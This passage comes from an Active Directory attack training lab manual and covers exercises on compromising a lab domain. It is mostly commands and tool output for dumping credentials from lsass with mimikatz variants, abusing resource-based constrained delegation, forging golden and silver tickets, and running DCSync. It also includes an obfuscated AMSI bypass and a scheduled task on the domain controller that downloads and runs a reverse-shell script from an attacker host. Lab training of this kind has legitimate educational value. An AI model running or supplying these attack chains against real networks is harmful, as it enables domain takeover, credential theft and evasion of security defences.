• Find a computer object in US domain where we have Write permissions.
• Abuse the Write permissions to access that computer as Domain Admin.
• Extract secrets from that machine for users and hunt for local admin privileges for the users.

Solution
We have already enumerated ACLs for studentuserx and studentusers group. Recall that we have admin
access to us-mgmt (we added studentuserx to the machineadmins group) but we never extracted
credentials from that machine. Let's do that now:

C:\AD\Tools>echo F | xcopy C:\AD\Tools\Loader.exe \\us-

mgmt\C$\Users\Public\Loader.exe /Y
Does \\us-mgmt\C$\Users\Public\Loader.exe specify a file name
or directory name on the target
(F = file, D = directory)? F
C:\AD\Tools\Loader.exe
1 File(s) copied

Add a netsh path to avoid defender, run the Loader.exe and load SafetyKatz in memory to extract
credentials:

C:\AD\Tools>winrs -r:us-mgmt cmd

C:\Users\studentuserx>netsh interface portproxy add v4tov4 listenport=8080

listenaddress=0.0.0.0 connectport=80 connectaddress=192.168.100.x
C:\Users\studentuserx>C:\Users\Public\Loader.exe -path http://
http://127.0.0.1:8080/SafetyKatz.exe
C:\Users\Public\Loader.exe -path http:// http://127.0.0.1:8080/SafetyKatz.exe
[snip]

mimikatz # sekurlsa::keys

[snip]
Authentication Id : 0 ; 8035962 (00000000:007a9e7a)
Session : RemoteInteractive from 2
User Name : mgmtadmin
Domain : US
Logon Server : US-DC
Logon Time : 1/7/2021 10:41:05 PM
SID : S-1-5-21-210670787-2521448726-163245708-1115

* Username : mgmtadmin
* Domain : US.TECHCORP.LOCAL
* Password : (null)

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 63

* Key List :
aes256_hmac
32827622ac4357bcb476ed3ae362f9d3e7d27e292eb27519d2b8b419db24c00f
rc4_hmac_nt e53153fc2dc8d4c5a5839e46220717e5
rc4_hmac_old e53153fc2dc8d4c5a5839e46220717e5
rc4_md4 e53153fc2dc8d4c5a5839e46220717e5
rc4_hmac_nt_exp e53153fc2dc8d4c5a5839e46220717e5
rc4_hmac_old_exp e53153fc2dc8d4c5a5839e46220717e5
[snip]

Now, let's check if there are any interesting ACLs for mgmtadmin. Recall our methodology is cyclic.
Ideally, we should run the full set of enumeration for each user we compromise. Let's load PowerView
after running InvisiShell. Note that the below command may take time to complete:

PS C:\AD\Tools> . C:\AD\Tools\PowerView.ps1
PS C:\AD\Tools> Find-InterestingDomainAcl -ResolveGUIDs |
?{$_.IdentityReferenceName -match 'mgmtadmin'}

ObjectDN : CN=US-
HELPDESK,CN=Computers,DC=us,DC=techcorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : ListChildren, ReadProperty, GenericWrite
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-210670787-2521448726-163245708-1115
IdentityReferenceName : mgmtadmin
IdentityReferenceDomain : us.techcorp.local
IdentityReferenceDN : CN=mgmtadmin,CN=Users,DC=us,DC=techcorp,DC=local
IdentityReferenceClass : user

Sweet! With GenericWrite on us-helpdesk. We can set Resource-based Constrained Delegation for us-
helpdesk for our own student VM. We are using our student VM computer object and not the
studentuserx as SPN is required for RBCD.

Start a process with privileges of mgtmadmin. Run the below command from an elevated shell:

C:\Windows\system32> C:\AD\Tools\SafetyKatz.exe "sekurlsa::opassth

/user:mgmtadmin /domain:us.techcorp.local
/aes256:32827622ac4357bcb476ed3ae362f9d3e7d27e292eb27519d2b8b419db24c00f
/run:cmd.exe" "exit"
[snip]

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 64

In the new process, set RBCD for student VMs to us-helpdesk using the Active Directory module. Note
that we are setting RBCD for the entire student VMs in the current instance of lab to avoid overwriting
the settings:

C:\Windows\system32>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
[snip]
PS C:\Windows\system32> Import-Module C:\AD\Tools\ADModule-
master\Microsoft.ActiveDirectory.Management.dll
PS C:\Windows\system32> Import-Module C:\AD\Tools\ADModule-
master\ActiveDirectory\ActiveDirectory.psd1
PS C:\Windows\system32> $comps =
'student1$','student11$','student12$','student13$','student14$','student15$',
'student16$','student17$','student18$','student19$','student20$','student21$'
,'student22$','student1$','student24$','student25$','student26$','student27$'
,'student28$','student29$','student30$'
PS C:\AD\Tools> Set-ADComputer -Identity us-helpdesk -
PrincipalsAllowedToDelegateToAccount $comps -Verbose
VERBOSE: Performing the operation "Set" on target "CN=US-
HELPDESK,CN=Computers,DC=us,DC=techcorp,DC=local".

Now, we need AES key for the student VM to use its identity. Run mimikatz on your own studentx
machine to extract AES keys. Start a command prompt with administrative privileges (Run as
administrator) and run the below command. Note that you will get different AES keys for the studentx$
account, go for the one with SID S-1-5-18 that is a well-known SID for the SYSTEM user:

C:\Windows\system32>C:\AD\Tools\SafetyKatz.exe -Command "sekurlsa::keys"

"exit"
[snip]
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : STUDENTx$
Domain : US
Logon Server : (null)
Logon Time : 1/9/2021 5:40:53 AM
SID : S-1-5-18

*
Username : studentx$
*
Domain : US.TECHCORP.LOCAL
*
Password : (null)
*
Key List :
aes256_hmac
3845eac1016c33077d3619b3f931168db1343a223f3d7f9fc4424c77f8383578
rc4_hmac_nt 3b5c12f380c5c7b142356e941a5cefa2
rc4_hmac_old 3b5c12f380c5c7b142356e941a5cefa2
rc4_md4 3b5c12f380c5c7b142356e941a5cefa2
rc4_hmac_nt_exp 3b5c12f380c5c7b142356e941a5cefa2
rc4_hmac_old_exp 3b5c12f380c5c7b142356e941a5cefa2

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 65

Use the AES key for studentx$ with Rubeus and request a TGS for HTTP SPN:

C:\AD\Tools>C:\AD\Tools\Rubeus.exe s4u /user:studentx$

/aes256:3845eac1016c33077d3619b3f931168db1343a223f3d7f9fc4424c77f8383578
/msdsspn:http/us-helpdesk /impersonateuser:administrator /ptt
[snip]
[*] Action: Import Ticket
[+] Ticket successfully imported!
[snip]

Let's use the HTTP TGS to access us-helpdesk as DA – administrator. Run the below command in the
process where we injected the TGS above:

PS C:\AD\Tools> klist
Current LogonId is 0:0x426960a

Cached Tickets: (1)

#0> Client: administrator @ US.TECHCORP.LOCAL

Server: http/us-helpdesk @ US.TECHCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40210000 -> forwardable pre_authent name_canonicalize
Start Time: 1/14/2021 5:42:03 (local)
End Time: 1/14/2021 15:42:03 (local)
Renew Time: 0
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:
C:\AD\Tools>winrs -r:us-helpdesk cmd
Microsoft Windows [Version 10.0.17763.557]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\Administrator.US>whoami
whoami
us\administrator

Now, to copy our loader to us-helpdesk, we need to access the filesystem. Let's request a TGS for CIFS
using Rubeus in the same process as above:

C:\AD\Tools>C:\AD\Tools\Rubeus.exe s4u /user:studentx$

/aes256:3845eac1016c33077d3619b3f931168db1343a223f3d7f9fc4424c77f8383578
/msdsspn:cifs/us-helpdesk /impersonateuser:administrator /ptt
[snip]

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 66

Now, copy the Netloader, add port redirection and run SafetyKatz on us-helpdesk to extract credentials
from lsass:

C:\AD\Tools>echo F | xcopy C:\AD\Tools\Loader.exe \\us-

helpdesk\C$\Users\Public\Loader.exe /Y
[snip]

C:\AD\Tools>winrs -r:us-helpdesk cmd

Microsoft Windows [Version 10.0.17763.557]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\Administrator.US>netsh interface portproxy add v4tov4
listenport=8080 listenaddress=0.0.0.0 connectport=80
connectaddress=192.168.100.x
C:\Users\Administrator.US> C:\Users\Public\Loader.exe -path
http://127.0.0.1:8080/SafetyKatz.exe
[snip]
Authentication Id : 0 ; 6672278 (00000000:0065cf96)
Session : RemoteInteractive from 2
User Name : helpdeskadmin
Domain : US
Logon Server : US-DC
Logon Time : 1/7/2021 10:34:05 PM
SID : S-1-5-21-210670787-2521448726-163245708-1120

*
Username : helpdeskadmin
*
Domain : US.TECHCORP.LOCAL
*
Password : (null)
*
Key List :
aes256_hmac
f3ac0c70b3fdb36f25c0d5c9cc552fe9f94c39b705c4088a2bb7219ae9fb6534
rc4_hmac_nt 94b4a7961bb45377f6e7951b0d8630be
rc4_hmac_old 94b4a7961bb45377f6e7951b0d8630be
rc4_md4 94b4a7961bb45377f6e7951b0d8630be
rc4_hmac_nt_exp 94b4a7961bb45377f6e7951b0d8630be
rc4_hmac_old_exp 94b4a7961bb45377f6e7951b0d8630be
[snip]

Reuse the AES keys of helpdeskadmin and use Find-PSRemotingLocalAdminAccess for hunting local
admin privileges. Run the OverPass-the-hash command from an elevated shell:

C:\Windows\System32> C:\AD\Tools\SafetyKatz.exe "sekurlsa::opassth

/user:helpdeskadmin /domain:us.techcorp.local
/aes256:f3ac0c70b3fdb36f25c0d5c9cc552fe9f94c39b705c4088a2bb7219ae9fb6534
/run:cmd.exe" "exit"
[snip]

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 67

In the new process:

C:\Windows\system32>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
[snip]
PS C:\Windows\system32> . C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
PS C:\Windows\system32> Find-PSRemotingLocalAdminAccess -Verbose
VERBOSE: Trying to run a command parallely on provided computers list using
PSRemoting .
US-HelpDesk
US-ADConnect

So, helpdeskadmin has administrative privileges on us-adconnect too!

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 68

Hands-On 14:
Task
• Using the NTLM hash or AES key of krbtgt account of us.techcorp.local, create a Golden ticket.
• Use the Golden ticket to (once again) get domain admin privileges from a machine.

Solution
From one of the previous hands-on, we have domain admin privileges (we abused the printer bug on us-
web with unconstrained delegation and ran DCSync attack). Let’s use the AES keys of krbtgt account to
create a Golden ticket.

Without using Invoke-Mimi.ps1

Run the below from an elevated shell:

C:\Windows\system32>C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden
/User:Administrator /domain:us.techcorp.local /sid:S-1-5-21-210670787-
2521448726-163245708
/aes256:5e3d2096abb01469a3b0350962b0c65cedbbc611c5eac6f3ef6fc1ffa58cacd5
/startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
[snip]
User : Administrator
Domain : us.techcorp.local (US)
SID : S-1-5-21-210670787-2521448726-163245708
User Id : 500
Groups Id : *513 512 520 518 519
PCRFHMJKey: 5e3d2096abb01469a3b0350962b0c65cedbbc611c5eac6f3ef6fc1ffa58cacd5
- aes256_hmac
Lifetime : 1/14/2021 7:30:53 AM ; 1/14/2021 5:30:53 PM ; 1/21/2021 7:30:53
AM
-> Ticket : ** Pass The Ticket **

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Golden ticket for 'Administrator @ us.techcorp.local' successfully submitted

for current session

Let's check the ticket

C:\Windows\system32>klist

Current LogonId is 0:0x42694a1

Cached Tickets: (1)

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 69

#0> Client: Administrator @ us.techcorp.local
Server: krbtgt/us.techcorp.local @ us.techcorp.local
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 1/14/2021 7:32:36 (local)
End Time: 1/14/2021 17:32:36 (local)
Renew Time: 1/21/2021 7:32:36 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

The Golden ticket is injected in the current session, we should be able to access any resource in the
domain as administrator (DA):

C:\Windows\system32>winrs -r:us-dc cmd

C:\Users\Administrator>whoami
whoami
us\administrator

Sweet!

Now, to extract all the secrets in the domain from the domain controller, we can use the below
command. Run the below commands from a command prompt where we injected the Golden Ticket:

C:\Windows\system32>echo F | xcopy C:\AD\Tools\Loader.exe \\us-

dc\C$\Users\Public\Loader.exe /Y
[snip]

C:\Windows\system32>winrs -r:us-dc cmd

C:\Users\Administrator>netsh interface portproxy add v4tov4 listenport=8080

listenaddress=0.0.0.0 connectport=80 connectaddress=192.168.100.x
C:\Users\Administrator>C:\Users\Public\Loader.exe -path
http://127.0.0.1:8080/SafetyKatz.exe
[snip]
hostname - Displays system local hostname

mimikatz # lsadump::lsa /patch

Domain : US / S-1-5-21-210670787-2521448726-163245708

RID : 000001f4 (500)

User : Administrator
LM :
NTLM : 43b70d2d979805f419e02882997f8f3f

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 70

RID : 000001f5 (501)
User : Guest
LM :
NTLM :

RID : 000001f6 (502)

User : krbtgt
LM :
NTLM : b0975ae49f441adc6b024ad238935af5

[snip]
mimikatz #

Using Invoke-Mimi.ps1and PowerShell Remoting

We can also use Invoke-Mimi from a normal PowerShell session:

PS C:\AD\Tools> . C:\AD\Tools\Invoke-Mimi.ps1
PS C:\AD\Tools> Invoke-Mimi -Command '"kerberos::golden /User:Administrator
/domain:us.techcorp.local /sid:S-1-5-21-210670787-2521448726-163245708
/aes256:5e3d2096abb01469a3b0350962b0c65cedbbc611c5eac6f3ef6fc1ffa58cacd5
/startoffset:0 /endin:600 /renewmax:10080 /ptt"'

.#####. mimikatz 2.2.0 (x64) #18362 May 30 2019 09:58:36

mimikatz(powershell) # kerberos::golden /User:Administrator

/domain:us.techcorp.local /sid:S-1-5-21-210670787-2521448726-163245708
/aes256:5e3d2096abb01469a3b0350962b0c65cedbbc611c5eac6f3ef6fc1ffa58cacd5
/startoffset:0 /endin:600 /renewmax:10080 /ptt
User : Administrator
Domain : us.techcorp.local (US)
SID : S-1-5-21-210670787-2521448726-163245708
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 5e3d2096abb01469a3b0350962b0c65cedbbc611c5eac6f3ef6fc1ffa58cacd5
- aes256_hmac
Lifetime : 1/14/2021 7:34:42 AM ; 1/14/2021 5:34:42 PM ; 1/21/2021 7:34:42
AM -> Ticket : ** Pass The Ticket **

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 71

Golden ticket for 'Administrator @ us.techcorp.local' successfully submitted
for current session

Access the DC using PowerShell Remoting:

PS C:\AD\Tools> Enter-PSSession -ComputerName us-dc

[us-dc]: PS C:\Users\Administrator\Documents> whoami
us\administrator

We can extract all the secrets from the DC. Run the below commands from a PowerShell session where
you injected Golden Ticket:

PS C:\AD\Tools> $sess = New-PSSession us-dc.us.techcorp.local

PS C:\AD\Tools> Enter-PSSession -Session $sess
[us-dc.us.techcorp.local]: PS C:\Users\Administrator\Documents> SèT-Itèm (
'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-
F'F','rE' ) ) ; ( Get-varIÀ`BLE ( ('1Q'+'2U') +'zX' ) -VaL
)."A`ssÈmbly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -
f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'
s',('Syst'+'em') ) )."gètfìElD"( ( "{0}{2}{1}" -
f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f
('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(
${nÙLl},${t`RuE} )
[us-dc.us.techcorp.local]: PS C:\Users\Administrator\Documents> exit
PS C:\AD\Tools> Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimi.ps1 -Session
$sess
PS C:\AD\Tools> Enter-PSSession -Session $sess
[us-dc.us.techcorp.local]: PS C:\Users\Administrator\Documents> Invoke-Mimi -
Command '"lsadump::lsa /patch"'
[snip]

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 72

Hands-On 15:
Task
• During the additional lab time, try to get command execution on the domain controller by
creating silver ticket for:
− HOST service
− WMI

Solution
From the information gathered in previous steps we have the hash for machine account of the domain
controller (us-dc$). Using the below command from an elevated shell, we can create a Silver Ticket that
provides us access to the HOST service of DC:

C:\Windows\system32>C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden
/User:Administrator /domain:us.techcorp.local /sid:S-1-5-21-210670787-
2521448726-163245708 /target:us-dc.us.techcorp.local /service:HOST
/aes256:36e55da5048fa45492fc7af6cb08dbbc8ac22d91c697e2b6b9b8c67b9ad1e0bb
/startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
[snip]
User : Administrator
Domain : us.techcorp.local (US)
SID : S-1-5-21-210670787-2521448726-163245708
User Id : 500
Groups Id : *513 512 520 518 519
XEZUHLNKey: 36e55da5048fa45492fc7af6cb08dbbc8ac22d91c697e2b6b9b8c67b9ad1e0bb
- aes256_hmac
XEZUHLN : HOST
Target : us-dc.us.techcorp.local
Lifetime : 1/14/2021 9:03:58 AM ; 1/14/2021 7:03:58 PM ; 1/21/2021 9:03:58
AM
-> Ticket : ** Pass The Ticket **

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Golden ticket for 'Administrator @ us.techcorp.local' successfully submitted

for current session

M8H3EZ5C(commandline) # exit
Bye!

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 73

Let's check the ticket.

C:\Windows\system32>klist

Current LogonId is 0:0x42694a1

Cached Tickets: (1)

#0> Client: Administrator @ us.techcorp.local

Server: HOST/us-dc.us.techcorp.local @ us.techcorp.local
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 1/14/2021 9:03:58 (local)
End Time: 1/14/2021 19:03:58 (local)
Renew Time: 1/21/2021 9:03:58 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

TGS for HOST on us-dc allows us to schedule tasks.

Start a listener in another command prompt session:

C:\Users\studentuserx>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
[snip]
PS C:\Users\studentuserx> . C:\AD\Tools\powercat.ps1
PS C:\Users\studentuserx> powercat -l -v -p 443 -t 1000
VERBOSE: Set Stream 1: TCP
VERBOSE: Set Stream 2: Console
VERBOSE: Setting up Stream 1...
VERBOSE: Listening on [0.0.0.0] (port 443)

Schedule and execute a task to run reverse shell on us-dc. Make sure to include the function call in the
Invoke-PowerShellTcp script. Run the below command from the command prompt where TGS for HOST
is injected:

C:\Windows\system32>schtasks /create /S us-dc.us.techcorp.local /SC Weekly

/RU "NT Authority\SYSTEM" /TN "Userx" /TR "powershell.exe -c 'iex (New-Object
Net.WebClient).DownloadString(''http://192.168.100.x/Invoke-
PowerShellTcpEx.ps1''')'"
SUCCESS: The scheduled task "Userx" has successfully been created.
C:\Windows\system32>schtasks /Run /S us-dc.us.techcorp.local /TN "Userx"
SUCCESS: Attempted to run the scheduled task "Userx".

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 74

On the listener:

PS C:\AD\Tools> powercat -l -v -p 443 -t 1000

VERBOSE: Set Stream 1: TCP
VERBOSE: Set Stream 2: Console
VERBOSE: Setting up Stream 1...
VERBOSE: Listening on [0.0.0.0] (port 443)
VERBOSE: Connection from [192.168.2.1] port [tcp] accepted (source port
63871)
VERBOSE: Setting up Stream 2...
VERBOSE: Both Communication Streams Established. Redirecting Data Between
Streams...

Windows PowerShell running as user US-DC$ on US-DC

PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> hostname
us-dc

For accessing WMI, we need to create to tickets – one for HOST service and another for RPCSS.

C:\Windows\system32>Get-WmiObject -Class win32_operatingsystem -ComputerName

us-dc.us.techcorp.local

SystemDirectory : C:\Windows\system32
Organization :
BuildNumber : 17763
RegisteredUser : Windows User
SerialNumber : 00429-90000-00001-AA056
Version : 10.0.17763

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 75

Hands-On 16:
Task
• Later during the extra lab time:
− Check if studentuserx has Replication (DCSync) rights.
− If yes, execute the DCSync attack to pull hashes of the krbtgt user.
− If no, add the replication rights for the studentuserx and execute the DCSync attack to pull
hashes of the krbtgt user.

Solution
We can check if studentuserx has replication rights using the following PowerView command. Use it
from InvisiShell:

C:\AD\Tools>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
[snip]
PS C:\AD\Tools>. C:\AD\Tools\PowerView.ps1
PS C:\AD\Tools> Get-DomainObjectAcl -SearchBase "dc=us,dc=techcorp,dc=local"
-SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-
get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object
{$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName
$_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "studentuserx"}

We got no output as studentuserx does not have the replication rights. But,

We can add those rights with Domain Administrator privileges! Using Overpass-the-hash, let's run a
command prompt with DA privileges:

C:\Windows\System32>C:\AD\Tools\SafetyKatz.exe "sekurlsa::opassth
/user:administrator /domain:us.techcorp.local
/aes256:db7bd8e34fada016eb0e292816040a1bf4eeb25cd3843e041d0278d30dc1b335
/run:cmd.exe" "exit"
[snip]

In the new process, use either PowerView:

PS C:\Windows\system32> Add-DomainObjectAcl -TargetIdentity

"dc=us,dc=techcorp,dc=local" -PrincipalIdentity studentuserx -Rights DCSync -
PrincipalDomain us.techcorp.local -TargetDomain us.techcorp.local -Verbose
VERBOSE: [Get-DomainSearcher] search base: LDAP://US-
DC.US.TECHCORP.LOCAL/DC=us,DC=techcorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(&(|(|(samAccountName=studentuserx)(name=studentuserx)(displayname=studentuse
rx))))
VERBOSE: [Get-DomainSearcher] search base: LDAP://US-
DC.US.TECHCORP.LOCAL/DC=us,DC=techcorp,DC=local

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 76

VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(&(|(distinguishedname=dc=us,dc=techcorp,dc=local)))
VERBOSE: [Add-DomainObjectAcl] Granting principal
CN=studentuserx,CN=Users,DC=us,DC=techcorp,DC=local 'DCSync' on
DC=us,DC=techcorp,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal
CN=studentuserx,CN=Users,DC=us,DC=techcorp,DC=local rights GUID
'1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' on DC=us,DC=techcorp,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal
CN=studentuserx,CN=Users,DC=us,DC=techcorp,DC=local rights GUID
'1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' on DC=us,DC=techcorp,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal
CN=studentuserx,CN=Users,DC=us,DC=techcorp,DC=local rights GUID
'89e95b76-444d-4c62-991a-0facbeda640c' on DC=us,DC=techcorp,DC=local

Use the Active Directory module with Set-ADACL from RACE as Domain Admin:

PS C:\AD\Tools> Set-ADACL -DistinguishedName 'DC=us,DC=techcorp,DC=local' -

SamAccountName studentuserx -GUIDRight DCSync -Verbose
VERBOSE: Getting the existing ACL for DC=us,DC=techcorp,DC=local.
VERBOSE: Setting ACL for "DC=us,DC=techcorp,DC=local" for "studentuserx" to
use "DCSync" right.

Let’s check for the rights once again from a normal shell:

PS C:\Windows\system32> Get-DomainObjectAcl -SearchBase

"dc=us,dc=techcorp,dc=local" -SearchScope Base -ResolveGUIDs |
?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -
match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty
'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} |
?{$_.IdentityName -match "studentuserX"}

AceQualifier : AccessAllowed
ObjectDN : DC=us,DC=techcorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes-In-Filtered-Set
ObjectSID : S-1-5-21-210670787-2521448726-163245708
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-210670787-2521448726-163245708-1223
AccessMask : 256
AuditFlags : None

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 77

IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : US\studentuserX
[snip]

Sweet! Now, below commands can be used as studentuserx to get the hashes of krbtgt user:

C:\AD\Tools>C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:us\krbtgt"

"exit"

PS C:\AD\Tools> Invoke-Mimi -Command '"lsadump::dcsync /user:us\krbtgt"'

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 78

Hands-On 17:
Task
• Check if AD CS is used by the target forest and find any vulnerable/abusable templates.
• Abuse any such template(s) to escalate to Domain Admin and Enterprise Admin.

Solution
Using the certify tool, enumerate the Certification Authorities in the target forest:

C:\AD\Tools> C:\AD\Tools\Certify.exe cas

_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0

[*] Action: Find certificate authorities

[*] Using the search base 'CN=Configuration,DC=techcorp,DC=local'

[*] Root CAs

Cert SubjectName : CN=TECHCORP-DC-CA, DC=techcorp, DC=local

Cert Thumbprint : F95C7E9F28F50C87F309A6EFB2CB3AEB0B2FAC86
Cert Serial : 4F3F87A449C15587446B046111AA6313
Cert Start Date : 7/12/2019 12:02:05 AM
Cert End Date : 7/12/2024 12:12:04 AM
Cert Chain : CN=TECHCORP-DC-CA,DC=techcorp,DC=local
[snip]
Certify completed in 00:00:18.9273849

Enumerate templates:

C:\AD\Tools> C:\AD\Tools\Certify.exe find

_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 79

v1.0.0

[*] Action: Find certificate templates

[snip]
[*] Available Certificates Templates :

CA Name : Techcorp-
DC.techcorp.local\TECHCORP-DC-CA
Template Name : User
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN,
SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL,
SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS,
PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting
File System, Secure Email
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : TECHCORP\Domain Admins S-1-5-21-
[snip]

CA Name : Techcorp-DC.techcorp.local\TECHCORP-
DC-CA
Template Name :
ForAdminsofPrivilegedAccessWorkstations
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS,
PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting
File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting
File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : TECHCORP\Domain Admins S-1-5-21-
2781415573-3701854478-2406986946-512
TECHCORP\Enterprise Admins S-1-5-21-
2781415573-3701854478-2406986946-519
US\pawadmin S-1-5-21-
210670787-2521448726-163245708-1138

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 80

Great! pawadmin has enrollment rights on a template ForAdminsofPrivilegedAccessWorkstations that
has ENROLLEE_SUPPLIES_SUBJECT attribute. This means we can request a certificate for ANY user as
pawadmin. We can also enumerate this using the following command:

C:\AD\Tools>C:\AD\Tools\Certify.exe find /enrolleeSuppliesSubject

[snip]
CA Name : Techcorp-DC.techcorp.local\TECHCORP-
DC-CA
Template Name :
ForAdminsofPrivilegedAccessWorkstations
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS,
PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting
File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting
File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : TECHCORP\Domain Admins S-1-5-21-
2781415573-3701854478-2406986946-512
TECHCORP\Enterprise Admins S-1-5-21-
2781415573-3701854478-2406986946-519
US\pawadmin S-1-5-21-
210670787-2521448726-163245708-1138
[snip]

Recall that we extracted certificate of pawadmin from the us-jump. Use the certificate to request a TGT
for pawadmin and inject in current session:

C:\AD\Tools>C:\AD\Tools\Rubeus.exe asktgt /user:pawadmin

/certificate:C:\AD\Tools\pawadmin.pfx /password:SecretPass@123 /nowrap /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

[*] Action: Ask TGT

[snip]
[+] Ticket successfully imported!

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 81

ServiceName : krbtgt/us.techcorp.local
ServiceRealm : US.TECHCORP.LOCAL
UserName : pawadmin
